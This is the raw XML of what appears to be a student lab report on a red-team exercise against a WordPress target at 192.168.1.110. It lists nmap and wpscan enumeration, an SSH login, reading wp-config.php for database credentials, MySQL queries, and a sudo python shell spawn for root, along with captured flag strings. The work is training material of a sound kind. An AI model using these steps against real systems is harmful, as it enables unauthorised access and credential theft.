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u5jebrxgc261" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team: Summary of Operations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002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81v1fsuxr3dd" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003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Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004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Critical Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006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vl5ebnbqsavm" w:id="2"/>
      <w:bookmarkEnd w:id="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Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TODO: Fill out the information below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Nmap scan results for each machine reveal the below services and OS details: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$ nmap -sP 192.168.1.1-255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  # TODO: Insert scan output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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scan identifies the services below as potential points of entry:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E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ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F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http</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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rpcbind</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="24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netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TODO: Fill out the list below. Include severity, and CVE numbers, if possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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following vulnerabilities were identified on each target:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Weak Password Policy, Broken Authentication, #2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Easily Accessible Data, Sensitive Data Exposure, #3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="24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Accessible Root Privileges, Broken Access Control, #5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TODO: Include vulnerability scan results to prove the identified vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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943600" cy="19304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ytewgk5lxci" w:id="3"/>
      <w:bookmarkEnd w:id="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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TODO: Fill out the details below. Include screenshots where possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Red Team was able to penetrate Target 1 and retrieve the following confidential data:</w:t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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag1{b9bbcb33e11b80be759c4e844862482d}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify the exploit used: Security misconfiguration &amp; SSH found open through nmap scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020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i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Include the command run: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan –-url http://192.168.1.110/wordpress -eu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh michael@192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To find Flag1: grep -RE flag html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0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943600" cy="4699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before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0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372100" cy="173355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733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40" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag2{fc3fd58dcdad9ab23faca6e9a36e581c}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify the exploit used: Security misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029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i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Include the command run: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A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i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/www/ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat flag2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0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943600" cy="13843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40" w:before="240" w:lineRule="auto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before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag3{afc01ab56b50591e7dccf93122770cd2}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify the exploit used: Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030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i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Include the command run: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031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rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /var/www/html/wordpress/wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032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rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033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rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034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rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035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rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select * from users;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select * from wp_posts; ( This command get Flag3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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143500" cy="219075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19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240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0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943600" cy="14478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40" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag4{715dea6c055b9fe3337544932f2941ce}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify the exploit used: Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B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i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Include the command run: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C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rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo python -c ‘import pty:pty.spawn(“/bin/bash”);’</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(used to escalate to root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D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rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat flag4.txt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638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6355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2.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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4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image" Target="media/image9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